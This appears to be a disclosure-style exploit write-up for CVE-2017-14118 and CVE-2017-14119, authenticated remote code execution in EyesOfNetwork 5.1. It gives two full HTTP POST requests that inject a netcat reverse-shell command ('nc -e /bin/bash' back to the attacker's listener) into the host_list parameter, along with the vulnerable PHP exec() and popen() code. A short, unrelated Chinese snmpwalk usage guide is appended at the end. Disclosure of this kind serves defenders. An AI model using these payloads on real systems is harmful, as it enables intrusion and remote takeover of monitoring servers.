[CVE-2017-14118]EyesOfNetwork (EON) 5.1 - Remote Code Execution

Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.

Proof of Concept 1

On the attacker's host, we start a handler:

nc -lvp 2333

The host_list parameter is not correctly filtered before it is used by
the exec() function.

There, it is possible to inject a payload like in the request below,
where we connect back to our handler:

POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.8.10
Connection: close
Content-Length: 284
Accept: */*
Origin: https://192.168.8.10
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: https://192.168.8.10/module/tool_all/
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=1378474655; user_name=admin; user_id=1; user_limitation=0; group_id=1

page=bylistbox&host_list=localhost.1.3.6.1.2.1.25.2.2||nc -e /bin/bash 192.168.8.1 2333||&tool_list=tools%2Finterface.php&snmp_com=EyesOfNetwork&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

Vulnerable code

In the module\tool_all\tools\interface.php file, line 50
we can see that our payload is injected into the exec() function without any sanitization

.......
        $command="-a $snmp_auth_protocol -u $username -A $password $snmp_priv_protocol $snmp_priv_passphrase $snmp_context";
    }
}
else{
    message(4,"Could not get SNMP Community","critical");
    die;
}
// Get host detail with snmp command
exec("snmpwalk -Oqv -c $snmp_community -v $snmp_version $command $host_name sysUpTime",$result_sysuptime);
exec("snmpwalk -Oqv -c $snmp_community -v $snmp_version $command $host_name sysName",$result_sysname);
........

Proof of Concept 2

On the attacker's host, we start a handler:

nc -lvp 2333

There, it is possible to inject a payload like in the request below,
where we connect back to our handler:

POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.8.10
Connection: close
Content-Length: 280
Accept: */*
Origin: https://192.168.8.10
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: https://192.168.8.10/module/tool_all/
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=1378474655; user_name=admin; user_id=1; user_limitation=0; group_id=1

page=bylistbox&host_list=localhost.1.3.6.1.2.1.4.20||nc -e /bin/bash 192.168.8.1 2333&tool_list=tools%2Fsnmpwalk.php&snmp_com=EyesOfNetwork+&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

Vulnerable code

In the module\tool_all\tools\snmpwalk.php file, line 67
we can see that our payload is injected into the popen() function without any sanitization

......
    $command = "snmpwalk -c $snmp_community -v $snmp_version -a $snmp_auth_protocol -u $username -A $password $snmp_priv_protocol $snmp_priv_passphrase $snmp_context $host_name";
}
else{
    $command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}
......
echo         "<p class='text-info fa fa-info-circle'> ".getLabel("label.exec_command")." : <b>".$command."</b></p><br>";
            $handle = popen($command,'r');
echo         "<p>";
            while($read = fread($handle,100)){ 
                echo nl2br($read); 
                flush();
            } 
            pclose($handle);
......

[Discoverer]
hi-building

Use CVE-2017-14118.

[Discoverer]
hi-building

Use CVE-2017-14119.

snmpwalk命令则是测试系统各种信息最有效的方法,常用的方法如下:

1、snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.25.1
得到取得windows端的系统进程用户数等

2、snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.25.2.2
取得系统总内存

3、snmpwalk -c public -v 1 -m ALL 10.0.1.52 hrSystemNumUsers
取得系统用户数

4、snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.4.20 取得IP信息

5、snmpwalk -v 2c -c public 10.0.1.52 system 查看系统信息

6、snmpwalk -v 1 10.0.1.52 -c public ifDescr 获取网卡信息

1、snmpwalk -v 2c -c public 10.0.1.52 .1.3.6.1.2.1.25.1
得到取得windows端的系统进程用户数等

其中-v是指版本,-c 是指密钥。

snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:

snmpwalk -v 2c -c public 10.0.1.52